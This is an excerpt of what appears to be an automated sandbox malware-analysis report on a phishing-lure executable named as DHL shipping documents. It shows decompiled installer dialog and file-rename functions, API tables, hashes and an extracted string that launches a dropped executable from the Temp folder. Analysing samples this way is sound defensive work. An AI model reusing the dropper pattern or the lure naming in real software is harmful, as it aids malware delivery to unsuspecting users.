										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                        0x00405038
                        0x00405051
                        0x00405056
                        0x0040505e
                        0x00405064
                        0x0040507a
                        0x0040507d
                        0x004052a8
                        0x004052af
                        0x004052c3
                        0x004052b1
                        0x004052b3
                        0x004052b6
                        0x004052b7
                        0x004052be
                        0x004052be
                        0x004052cf
                        0x004052dd
                        0x004052e0
                        0x004052f6
                        0x0040536b
                        0x0040536e
                        0x00405370
                        0x0040537a
                        0x00405388
                        0x00405388
                        0x0040538a
                        0x00405394
                        0x0040539a
                        0x0040539d
                        0x004053a0
                        0x004053bb
                        0x004053a2
                        0x004053ac
                        0x004053ac
                        0x004053a0
                        0x00405394
                        0x00000000
                        0x0040536e
                        0x004052fb
                        0x00405306
                        0x0040530b
                        0x00405312
                        0x00405317
                        0x0040531b
                        0x00405326
                        0x00405326
                        0x0040532a
                        0x0040532e
                        0x00405332
                        0x00405345
                        0x00405334
                        0x00405334
                        0x0040533b
                        0x00405341
                        0x0040533d
                        0x0040533d
                        0x0040533d
                        0x0040533b
                        0x00405349
                        0x0040534b
                        0x0040535e
                        0x00405361
                        0x00405364
                        0x00405364
                        0x0040532e
                        0x00000000
                        0x0040531b
                        0x004052fd
                        0x00405304
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004053be
                        0x004053be
                        0x004053c5
                        0x00405436
                        0x0040543e
                        0x00405446
                        0x00405446
                        0x0040544f
                        0x00405451
                        0x00405458
                        0x0040545b
                        0x0040545b
                        0x00405461
                        0x00405468
                        0x0040546b
                        0x0040546b
                        0x00405471
                        0x00405477
                        0x0040547d
                        0x0040547d
                        0x0040548a
                        0x004055eb
                        0x004055f2
                        0x0040560f
                        0x00405615
                        0x00405627
                        0x00405627
                        0x00000000
                        0x00405490
                        0x00405492
                        0x00405497
                        0x0040549c
                        0x004054a1
                        0x004054a3
                        0x004054a3
                        0x004054a4
                        0x004054a5
                        0x004054a7
                        0x004054a7
                        0x004054af
                        0x004054f0
                        0x004054f2
                        0x00405502
                        0x00405505
                        0x0040550a
                        0x00405511
                        0x00405514
                        0x004055b6
                        0x004055bf
                        0x004055c7
                        0x004055c7
                        0x004055d5
                        0x004055e6
                        0x004055e6
                        0x00000000
                        0x004055d5
                        0x0040551a
                        0x0040551d
                        0x00405523
                        0x00405528
                        0x0040552a
                        0x0040552c
                        0x00405532
                        0x00405539
                        0x0040553e
                        0x00405545
                        0x00405548
                        0x00405548
                        0x0040554f
                        0x0040555b
                        0x0040555f
                        0x00405561
                        0x00405561
                        0x00405551
                        0x00405553
                        0x00405553
                        0x00405581
                        0x0040558d
                        0x0040559c
                        0x0040559c
                        0x0040559e
                        0x004055a1
                        0x004055aa
                        0x00000000
                        0x004054b1
                        0x004054bc
                        0x004054bf
                        0x004054c4
                        0x004054c6
                        0x004054ca
                        0x004054da
                        0x004054e4
                        0x004054e6
                        0x004054e9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004054cc
                        0x004054cc
                        0x004054d2
                        0x004054d4
                        0x004054d4
                        0x004054d5
                        0x004054d6
                        0x00000000
                        0x004054cc
                        0x004054af
                        0x0040548a
                        0x004053cd
                        0x00000000
                        0x004053e3
                        0x004053ed
                        0x004053f2
                        0x00000000
                        0x00000000
                        0x00405404
                        0x00405409
                        0x00405415
                        0x00405415
                        0x00405417
                        0x00405426
                        0x00405428
                        0x0040542c
                        0x0040542f
                        0x00000000
                        0x0040542f
                        0x004053cd
                        0x00405083
                        0x00405088
                        0x00405091
                        0x00405098
                        0x004050aa
                        0x004050b5
                        0x004050bb
                        0x004050c9
                        0x004050dd
                        0x004050e2
                        0x004050ef
                        0x004050f4
                        0x0040510a
                        0x0040511b
                        0x00405128
                        0x00405128
                        0x0040512b
                        0x00405131
                        0x00405133
                        0x00405136
                        0x0040513b
                        0x00405140
                        0x00405142
                        0x00405142
                        0x00405162
                        0x00405162
                        0x00405164
                        0x00405165
                        0x0040516a
                        0x00405170
                        0x00405174
                        0x00405179
                        0x00405181
                        0x00405185
                        0x0040518a
                        0x0040518f
                        0x00405197
                        0x0040519a
                        0x0040526a
                        0x0040527d
                        0x00000000
                        0x004051a0
                        0x004051a3
                        0x004051a6
                        0x004051a9
                        0x004051a9
                        0x004051af
                        0x004051b8
                        0x004051bb
                        0x004051bf
                        0x004051c2
                        0x004051c5
                        0x004051ce
                        0x004051d7
                        0x004051da
                        0x004051dd
                        0x004051e0
                        0x0040521e
                        0x00405249
                        0x00405220
                        0x0040522f
                        0x0040522f
                        0x004051e2
                        0x004051e5
                        0x004051f3
                        0x004051fd
                        0x00405205
                        0x0040520c
                        0x00405217
                        0x00405217
                        0x004051e0
                        0x0040524f
                        0x00405250
                        0x0040525c
                        0x0040525c
                        0x00405268
                        0x00405283
                        0x00405286
                        0x004052a3
                        0x00000000
                        0x00405288
                        0x0040528d
                        0x00405296
                        0x00405629
                        0x0040563b
                        0x0040563b
                        0x00405286
                        0x00000000
                        0x00405268
                        0x0040519a

                        APIs
                        • GetDlgItem.USER32 ref: 00405049
                        • GetDlgItem.USER32 ref: 00405054
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                        • LoadImageW.USER32 ref: 004050B5
                        • SetWindowLongW.USER32 ref: 004050CE
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                        • DeleteObject.GDI32(00000000), ref: 0040512B
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                        • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                        • SetWindowLongW.USER32 ref: 0040527D
                        • ShowWindow.USER32(?,00000005), ref: 0040528D
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                        • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                        • GlobalFree.KERNEL32 ref: 0040546B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                        • ShowWindow.USER32(?,00000000), ref: 00405615
                        • GetDlgItem.USER32 ref: 00405620
                        • ShowWindow.USER32(00000000), ref: 00405627
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                        • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                        • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                        • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                        0x00404795
                        0x004048c2
                        0x0040491f
                        0x00404923
                        0x004049f0
                        0x004049f2
                        0x004049f2
                        0x004049f8
                        0x004049f8
                        0x004049fb
                        0x00000000
                        0x00404a02
                        0x00404931
                        0x00404937
                        0x00404941
                        0x0040494c
                        0x0040494f
                        0x00404952
                        0x0040495d
                        0x00404960
                        0x00404967
                        0x00404974
                        0x00404985
                        0x0040498b
                        0x00404993
                        0x004049a1
                        0x004049a7
                        0x004049a7
                        0x00404967
                        0x004049b1
                        0x00000000
                        0x004049bc
                        0x004049c0
                        0x004049d0
                        0x004049d0
                        0x004049d6
                        0x004049e2
                        0x004049e2
                        0x00000000
                        0x004049e6
                        0x004049b1
                        0x004048cd
                        0x00000000
                        0x004048df
                        0x004048e4
                        0x004048ea
                        0x00000000
                        0x00000000
                        0x00404913
                        0x00404915
                        0x0040491a
                        0x00000000
                        0x0040491a
                        0x004048cd
                        0x0040479b
                        0x0040479e
                        0x004047a3
                        0x004047b4
                        0x004047b4
                        0x004047bc
                        0x004047bf
                        0x004047c3
                        0x004047c6
                        0x004047ca
                        0x004047cd
                        0x004047d0
                        0x004047d3
                        0x004047da
                        0x004047dc
                        0x004047dc
                        0x004047e6
                        0x004047f3
                        0x004047fd
                        0x00404802
                        0x00404805
                        0x0040480a
                        0x00404821
                        0x00404828
                        0x0040483b
                        0x0040483e
                        0x00404852
                        0x00404859
                        0x0040485e
                        0x00404863
                        0x00404863
                        0x00404871
                        0x0040487f
                        0x00404891
                        0x00404896
                        0x004048a6
                        0x004048a8
                        0x00000000

                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                        • GetDlgItem.USER32 ref: 00404835
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                        • GetSysColor.USER32(?), ref: 00404863
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                        • lstrlenW.KERNEL32(?), ref: 00404884
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                        • GetDlgItem.USER32 ref: 004048FF
                        • SendMessageW.USER32(00000000), ref: 00404906
                        • GetDlgItem.USER32 ref: 00404931
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                        • SetCursor.USER32(00000000), ref: 00404985
                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                        • SetCursor.USER32(00000000), ref: 004049A1
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                        Strings
                        • "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m, xrefs: 00404960
                        • N, xrefs: 0040491F
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$N
                        • API String ID: 3103080414-456021548
                        • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                        • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                        • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                        • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                        0x004062ae
                        0x004062b7
                        0x004062be
                        0x004062c8
                        0x004062dc
                        0x00406304
                        0x0040630b
                        0x0040630f
                        0x00406313
                        0x00406333
                        0x0040633a
                        0x00406344
                        0x00406351
                        0x00406356
                        0x0040635b
                        0x0040635f
                        0x0040636e
                        0x00406370
                        0x0040637d
                        0x00406381
                        0x0040641c
                        0x00000000
                        0x00406397
                        0x004063a4
                        0x004063c8
                        0x004063cc
                        0x004063eb
                        0x004063ef
                        0x004063ef
                        0x004063f1
                        0x004063fa
                        0x00406405
                        0x00406410
                        0x00406416
                        0x00000000
                        0x00406416
                        0x004063ce
                        0x004063d1
                        0x004063dc
                        0x004063d8
                        0x004063da
                        0x004063db
                        0x004063db
                        0x004063e3
                        0x004063e5
                        0x00000000
                        0x004063e5
                        0x004063af
                        0x004063b5
                        0x00000000
                        0x004063b5
                        0x00406381
                        0x0040635f
                        0x004062de
                        0x004062e9
                        0x004062f2
                        0x004062f6
                        0x00000000
                        0x00000000
                        0x004062f6
                        0x00406427

                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                        • GetShortPathNameW.KERNEL32 ref: 004062F2
                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                        • GetShortPathNameW.KERNEL32 ref: 0040630F
                        • wsprintfA.USER32 ref: 0040632D
